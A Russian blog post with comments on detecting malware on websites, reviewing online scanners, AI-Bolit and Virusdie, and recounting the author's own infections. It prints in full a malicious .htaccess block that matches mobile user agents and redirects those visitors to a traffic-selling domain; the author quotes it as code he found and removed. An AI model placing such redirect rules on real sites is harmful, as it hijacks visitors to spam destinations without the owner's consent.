Вы уверены, что ваши сайты не заражены вирусами? Вы проверили сайт в онлайн антивирусе? Забудьте, онлайн антивирусы не смогут никогда найти вирусы, вшитые в ваш сайт умелыми хакерами.
Максимум, что они смогут, так это определить вредоносные скрипты, которые вы сами по неосмотрительности установили на своём сайте. Поэтому нужны более радикальные методы проверки сайта на вирусы, которые смогут не просто проскакать по вершкам, а заглянуть внутрь вашего проекта.
Как проверить сайт на вирусы платно и бесплатно?
В этой статье будет рассказано о нескольких способах проверить свой сайт на вирусы:
Онлайн антивирусы - самый простой, но при этом и самый ненадежный способ.
Антивирус Айболит - самый надежный, но и самый сложный способ.
Сайт антивирус Вирусдай - самый оптимальный вариант.
Но сначала немного о том, чем опасен вирус на сайте.
Чем опасен взлом сайта?
Но вначале немного теории и личного опыта - ломали меня не раз. Зачем сайт заражают вирусом? Получив доступ к вашему сайту злоумышленники могут выполнить следующее:
Начнут "сливать" ваш трафик на свои проекты.
Скачают содержимое сервера и базы данных для продажи третьим лицам.
Подменят контактные или платежные данные на сайте, скачают персональные данные пользователей.
Разместят на вашем сайте дорвеи со спам-ссылками.
Внедрят на страницы сайта вирусы, трояны или эксплойты, заражая посетителей.
Проведут с вашего сервера спам-рассылку.
Продадут доступ к взломанному сайту другим злоумышленникам для последующего несанкционированного проникновения.
Важно понимать: сайты с вирусами могут попасть под санкции поисковых систем и потерять позиции. Мой хостинг уже не раз бомбили хакеры, обрушивая на него мощные DDOS атаки . Для чего это делается? Цель банальна: получить доступ к вашим паролям или залить вирус на ваш сайт через уязвимость в коде.
И это им удаётся, так как уже два раза я удалял залитые ими дорвеи со своих сайтов. Но это пол беды, так как мои сайты были инфицированы после этого, и даже смена паролей мало что даёт при этом. И гарантий, что всё не повторится, просто нет.
Да и сейчас, после авторизации, почти все мои сайты выкидывают такую страницу:
Потом, когда я опять ввожу адрес, я захожу на сайт и в админку в том числе. Что за беда, до сих пор не знаю. На этом сайте, самом моём последнем, такого нет. Так и под DDOS атаки он ещё не попадал....
Самый простой способ вылечить сайт - это снести всё и установить скрипт сайта заново . Но, как понимаете, это крайняя мера, к которой нужно прибегать только в крайнем случае. Да и к тому же вредоносный код могут вшить в шаблон, а его не заменишь. Поэтому для начала нужно попробовать определить, заражён ли наш сайт или нет? Как это сделать?
Где проверить сайт на вирусы онлайн?
Проверка сайта на вирусы онлайн - хотя этот метод не самый эффективный, как я и написал выше, можно начать с него. Есть неплохой сервис Antivirus Alarm .
Просто вводим адрес сайта и ждем, пока сервис проверит ваш сайт на вирусы. Если он найдет что-то подозрительное, то выдаст это в отчете. Но если даже этот онлайн антивирус ничего не найдет, попробуйте более продвинутое решение.
Как проверить на вирусы сайт скриптом?
Буквально неделю назад я проверил все свои сайты антивирусом Айболит и обнаружил, что мой основной сайт инфицирован.
Что это за антивирус и как с ним работать?
Этот антивирус можно скачать с сайта разработчиков - Айболит . На данный момент есть версия для Windows, раньше можно было работать только через хостинг.
Внимание! Проект Айболит был выкуплен Cloud Linux и теперь называется imunify360 и им можно пользоваться только по платной подписке.
Но есть и хорошая новость: на хостинге Beget антивирус Айболит работает в бесплатном режиме и позволяет быстро проверить сайт на вирусы.
Что может этот антивирус для сайта ? Вот что:
- искать вирусы, вредоносные и хакерские скрипты на хостинге: шеллы по сигнатурам и гибким паттернам, шеллы на основе несложной эвристики - все то, что обычные - антивирусы и сканеры найти не могут.
- искать уязвимые скрипты timthumb, fckeditor, uploadify, и ряд других.
- искать редиректы в .htaccess на вредоносные сайты.
- искать код ссылочных бирж, таких как sape/trustlink/linkfeed/... в .php файлах
- определять каталоги и файлы дорвеев.
- искать пустые ссылки (невидимые ссылки) в шаблонах.
- показывать директории, открытые на запись.
- работать со всеми cms без исключения (joomla, wordpress, drupal, dle, bitrix, phpbb,...)
- отсылать отчет по email или сохранять в файл.
Установка проста: распаковываем архив и заливаем в папку с нашим сайтом файлы ai-bolit.php, .aignore, .aurlignore из папки ai-bolit и файл из папки known_files, который соответствует версии нашей CMS, в моём случае это .aknown.wp_3_8_1 для wordpress. Возможно, нужно будет задать правильные права на файлы, 755, например.
Далее можно проверить сайт через браузер, но лучше сделать полную проверку. А для этого нам будет нужен доступ по SSH. Если ваш хостинг не даёт вам такой доступ, то у вас плохой хостинг, меняйте его:)
Ну а тем, у кого правильный хостинг, нужно войти в терминал (У меня линукс, поэтому никаких эмуляторов не нужно) и далее подключаемся к нашему хостингу через SSH.
Как это делать точно, объяснять не буду, если вы не в теме, то тут нужен индивидуальный подход, пишите в комментариях, объясню.
После подключения нужно перейти при помощи команды cd в папку с сайтом. Далее даём команду:
После этого начнётся сканирование, которое продлится достаточно долго, в зависимости от размера сайта. После окончания в папке с сайтом появится файл с примерным названием AI-BOLIT-REPORT-07-04-2014_23-10-719945.html
Открываем файл и анализируем, что да как. У меня выдало, к примеру, в самом начале:
Найдены сигнатуры шелл-скрипта. Подозрение на вредоносный скрипт: (12)
Но на самом деле оказалось, что вирус только один, а остальные срабатывания были на сертификаты, которые похожи на шифрованные записи.
Самый простой способ разобраться тут - это скачать чистый вордпресс, или что у вас там, и сравнивать подозрительные фалы. Если в оригинале все тоже самое, то волноваться не нужно. Ну а если нет, то удаляем вредоносный код. Далее у меня ругалось на:
Двойное расширение, зашифрованный контент или подозрение на вредоносный скрипт. Требуется дополнительный анализ: (14)
Ругался антивирус на один плагин - ТОП 10 - не уверен, что есть проблема. Так же и другие опасности были ложным срабатыванием.
Далее в плагине google-sitemap-generator были найдены фреймы - удалил на всякий случай.
Так же эвристический анализ заругался на файлы wordpress, но я сверил с оригиналами и всё было нормально.
В этих файлах размещены невидимые ссылки. Подозрение на ссылочный спам:
Тут я плагин, создающий кнопку ВВЕРХ - в нем была скрытая ссылка.
Хотя в отношении плагинов тут нужно понимать, что в них почти во всех есть ссылки. Но решается это элементарно, закрытием папки с плагинами от индексации. В wordpress это можно сделать, вписав в robot.txt строку Disallow: /wp-content/plugins
В каждом случае всё будет очень индивидуально, поэтому трудно написать что-то конкретное. Цель статьи больше состоит в том, чтобы дать направление.
Все бы тут хорошо, да не хватает одного - постоянного мониторинга. Каждый день запускать этот антивирус не будешь, а хакеры работают без выходных. И тут нам поможет другой отличный сервис. Как проверить на вирус сайт сервисом?
Автоматическая проверка сайта на вирусы
Не так давно появился сервис Вирусдай , который как раз может постоянно осуществлять мониторинг сайта на отсутствие вирусов. Выглядит все очень приятно и функционально, лечение сайтов от вирусов тут удобнее всего:
Нужно добавить к ним свой сайт и скачать php файл синхронизации, который заливается в корень сайта. Далее можно запустить синхронизацию и сервис проверит ваш сайт на вирусы.
В бесплатной версии возможности ограничены, поэтому если вам дорог ваш сайт, то можно немного заплатить и спать спокойно - сервис будет сам искать вирусы и тут же их лечить.
Ну вот, на одном сайте обнаружен вирус. Этот сайт как раз выносил грузил мне сервер, пока я не вырубил протокол удаленной публикации. Проблема исчезла, но вирус остался:
Ну что же, попробуем удалить заразу. Нет, не тут то было, сервис бесплатно удалять вирус не хочет, выдал лишь такую информацию:
Найденные угрозы : h.ExternalRedirect
В файле конфигурации WEB-сервера содержатся инструкции, условно или безусловно перенаправляющие пользователей сайта на сторонние ресурсы. Рекомендуется удаление .
Как удалить вирус, который я нашел на сайте? Попробую найти вручную, а может и подключусь на платный тариф, так как безопасность сайтов очень важна.
Хотя, скорее всего, эту заразу я принес с шаред хостинга, теперь у меня отличный VPS и проблем особых не было. Итак, регистрируемся на Вирусдай и подключаем свой сайт.
Вот как проверить свой сайт на вирусы, если вы знаете еще способы, и даже лучше этих, то всем было бы интересно о них узнать...
Вчера у меня произошло не очень приятное происшествие - заразили все мои сайты. Хорошо, что я был за компьютером и сразу заметил проблему. Что произошло?
Один мой сайт стало вдруг перебрасывать на какой то сайт знакомств, неприличный сайт, мягко говоря. При переходе на мой домен тут же шёл редирект на этот спамерский сайт.
Это очень плохая ситуация, так как если сразу не решить проблему, то вы можете распугать посетителей. А если это продлится долго, то поисковые системы могут наложить на ваш сайт фильтр и вы потеряете все позиции в поиске.
Что делать если сайт заражен?
Я уже писал как то о том, как найти вирус на сайте, но в данном случае требовалось найти вирус быстро. Я тут же стал искать вредоносный код вручную.
Так как переадресация шла со всех страниц, то я подумал, что какой скрипт мне внедрили в шапку (header.php) или подвал (footer.php). Но там постороннего кода не было.
Я тут же связался со службой поддержки хостинга:
- У меня сайт такой то, стал переадресовываться на какой то неприличный ресурс, помогите решить проблему.
Но не успели они мне ответить, как я сам догадался куда ещё нужно посмотреть. В файле .htaccess, который находится в корне сайта, я обнаружил вот такой код:
RewriteEngine On
RewriteBase /
RewriteCond % { HTTP_USER_AGENT } android | avantgo | bada / | blackberry | blazer | compal | elaine | fennec | hiptop | iemobile | ip ( hone | od | pad ) | iris | kindle | lge | maemo | meego . + mobile | midp | mmp | netfront | palm ( os ) ? | phone | p ( ixi | re ) / | plucker | pocket | psp | series ( 4 | 6 ) 0 | symbian | treo | up . ( browser | link ) | vodafone | wap | windows ( ce | phone ) | xda | xiino [ NC , OR ]
RewriteCond % { HTTP_USER_AGENT } ^ ( 1207 | 6310 | 6590 | 3gso | 4thp | 50 [ 1 - 6 ] i | 770s | 802s | a wa | abac | ac ( er | oo | s - ) | ai ( ko | rn ) | al ( av | ca | co ) | amoi | an ( ex | ny | yw ) | aptu | ar ( ch | go ) | as ( te | us ) | attw | au ( di | - m | r | s ) | avan | be ( ck | ll | nq ) | bi ( lb | rd ) | bl ( ac | az ) | br ( e | v ) w | bumb | bw - ( n | u ) | c55 / | capi | ccwa | cdm - | cell | chtm | cldc | cmd - | co ( mp | nd ) | craw | da ( it | ll | ng ) | dbte | dc - s | devi | dica | dmob | do ( c | p ) o | ds ( 12 | - d ) | el ( 49 | ai ) | em ( l2 | ul ) | er ( ic | k0 ) | esl8 | ez ( [ 4 - 7 ] 0 | os | wa | ze ) | fetc | fly ( - | _ ) | g1 u | g560 | gene | gf - 5 | g - mo | go ( . w | od ) | gr ( ad | un ) | haie | hcit | hd - ( m | p | t ) | hei - | hi ( pt | ta ) | hp ( i | ip ) | hs - c | ht ( c ( - | | _ | a | g | p | s | t ) | tp ) | hu ( aw | tc ) | i - ( 20 | go | ma ) | i230 | iac ( | - | / ) | ibro | idea | ig01 | ikom | im1k | inno | ipaq | iris | ja ( t | v ) a | jbro | jemu | jigs | kddi | keji | kgt ( | / ) | klon | kpt | kwc - | kyo ( c | k ) | le ( no | xi ) | lg ( g | / ( k | l | u ) | 50 | 54 | - [ a - w ] ) | libw | lynx | m1 - w | m3ga | m50 / | ma ( te | ui | xo ) | mc ( 01 | 21 | ca ) | m - cr | me ( di | rc | ri ) | mi ( o8 | oa | ts ) | mmef | mo ( 01 | 02 | bi | de | do | t ( - | | o | v ) | zz ) | mt ( 50 | p1 | v ) | mwbp | mywa | n10 [ 0 - 2 ] | n20 [ 2 - 3 ] | n30 ( 0 | 2 ) | n50 ( 0 | 2 | 5 ) | n7 ( 0 ( 0 | 1 ) | 10 ) | ne ( ( c | m ) - | on | tf | wf | wg | wt ) | nok ( 6 | i ) | nzph | o2im | op ( ti | wv ) | oran | owg1 | p800 | pan ( a | d | t ) | pdxg | pg ( 13 | - ( [ 1 - 8 ] | c ) ) | phil | pire | pl ( ay | uc ) | pn - 2 | po ( ck | rt | se ) | prox | psio | pt - g | qa - a | qc ( 07 | 12 | 21 | 32 | 60 | - [ 2 - 7 ] | i - ) | qtek | r380 | r600 | raks | rim9 | ro ( ve | zo ) | s55 / | sa ( ge | ma | mm | ms | ny | va ) | sc ( 01 | h - | oo | p - ) | sdk / | se ( c ( - | 0 | 1 ) | 47 | mc | nd | ri ) | sgh - | shar | sie ( - | m ) | sk - 0 | sl ( 45 | id ) | sm ( al | ar | b3 | it | t5 ) | so ( ft | ny ) | sp ( 01 | h - | v - | v ) | sy ( 01 | mb ) | t2 ( 18 | 50 ) | t6 ( 00 | 10 | 18 ) | ta ( gt | lk ) | tcl - | tdg - | tel ( i | m ) | tim - | t - mo | to ( pl | sh ) | ts ( 70 | m - | m3 | m5 ) | tx - 9 | up ( . b | g1 | si ) | utst | v400 | v750 | veri | vi ( rg | te ) | vk ( 40 | 5 [ 0 - 3 ] | - v ) | vm40 | voda | vulc | vx ( 52 | 53 | 60 | 61 | 70 | 80 | 81 | 83 | 85 | 98 ) | w3c ( - | ) | webc | whit | wi ( g | nc | nw ) | wmlb | wonu | x700 | yas - | your | zeto | zte - ) [ NC ]
RewriteRule ^ $ _luxurytds . com / go . php ? sid = 1 [ R , L ]
# BULLETPROOF .50.8 >>>>>>> SECURE .HTACCESS
Как только я его удалил, все стало работать как нужно. На все у меня ушло 5 мин. Но если бы на моем месте был полный новичок, то у него на это могла бы уйти куча времени, если бы он вообще смог найти проблему сам.
К своему ужасу я обнаружил, что подобным образом заразили все мои сайты. Я тут же устранил проблему и написал в поддержку хостинга:
У меня все сайты заразили, значит заразили и все на вашем хостинге, не плохо было бы предупредить народ.
На что последовал ответ:
"Заразили" только файлы Ваших сайтов. Следовательно, в каком-то (каких-то) из Ваших сайтов имеются уязвимости, которую(ые) использовали для изменения файлов на аккаунте. Вам нужно обратиться к веб-разработчику для поиска и устранения этих уязвимостей.
Может и так, не проверить. Это уже не первый случай, когда мои сайты на этом хостинге пытаются заразить. Неужели у всех вебмастеров такие проблемы? Или это только на моём хостинге?
Это мой не первый хостинг и нигде у меня не было таких проблем. Все больше склоняюсь к том, чтобы сменить хостинг, к примеру на ЭТОТ.
Не успел я решить эту проблему, как техподдержка написала мне, что другой мой сайт рассылает спам. Как оказалось, мне в папку с одним плагином залили посторонний php файл, и через него как то слали спам.
Я удалил этот файл, и проблема решилась. У меня уже чётко складывается впечатление, что WordPress - это тот же Windows, и что с этим делать ?
Отличная актуальная статья, ждем новых.
Спасибо за статью, очень актуально для меня. Google стал ругаться, что у меня вредоносное ПО. Скрипт я нашла тот, который мне гугл указал, но не уверена, что других пакостей нет. Но я не программист, Вы не могли бы подробнее объяснить , как в word press войти в SSH м запустить скрипт Aibolit?
У вас на хостинге должен быть доступ по SSH предоставлен, не все хостинги его дают. У вас есть?
Как оказалось, это и не вирус был, а просто я забыл убрать редирект из .htaccess, до этого переносил раздел сайта на другой ресурс.
Как-то раз приходилось проверять Айболитом, утилита хорошая, показывает не только явные угрозы, но и подозрения. Нужно уметь фильтровать результаты проверки, чтобы не наделать глупостей.
Еще вот недавно появился антивирус для сайтов Manul - совместная разработка Яндекса и создателей AI-Bolit. К сожалению потестировать пока не удалось, в прошлый раз когда устанавливал выскакивала ошибка ajax, перекрывая экран. Писал в техподдержку, ответа не получил, но на Вебмастерской Яндекса их специалист сказал что поддержка получила массу таких писем с этой ошибкой и они работают над тем, чтобы Manul без проблем запускался на различных хостингах.
Я в случае с айболитом делал так: сканировал так же чистый wordpress и потом сравнивал, так как и в нем по умолчанию есть зашифрованные ссылки.
Я вот переехал на VPS и вообще забыл про взломы. Рекомендую - //zmoe.ru/links/3n
Пока на виртуальном хостинге останусь, с VPS нужно разбираться, самому все настраивать, не приходилось заниматься администрированием сервера настолько глубоко. Но, придет время когда-нибудь - перееду)
Мне тоже вирусдай написал - ай-ай проблемы. Проблема - перенаправление с WWW на версию без WWW.
Ваш сайт действительно супер большое спасибо автору.
После прочитанной мной информации на данном сайте работать стало намного легче.
Разве можно делать сайт о заработке на бесплатном хостинге? Не солидно и бесперспективно...
Может я и параноик, но очень не хотелось бы заливать к себе на сайт чужой php код, даже для проверки на вирусы. Может как то можно без этого обойтись?
А когда ставите себе на сайт те же плагины wordpress, то не боитесь обилию php кода в них? Люди специально делают это для нас, если бы там были вирусы, то давно бы их уже попалили. Зачем им репутацию портить?
А по другому не проверить, так как онлайн антивирусы не имеют доступа ко всем файлам на сайте.
Выручил,спасибо!!!!!!!!!
Я был в панике,но все решилось очень даже быстро
Респект
А по защитам сайта, что обычно кроме паролей устанавливают против взлома. Понятно, что антивирусник нужен, но хотелось бы побольше о превентивных мерах))
Первое, что нужно сделать - это купить виртуальный сервер, если вы пользуетесь до сих пор обычным PHP хостингом. Второе - изменить страницу входа на сайт и скрыть ссылку на нее. Третье - на какое то время поставить плагин, который проверить настройки сайт и прикрыть уязвимости, которые он скажет. И все. Если уже сильно захотят взломать, то ничего не сделаете уже, но обычный сайт мало кому нужен, ломают хостинг или все сразу на автомате.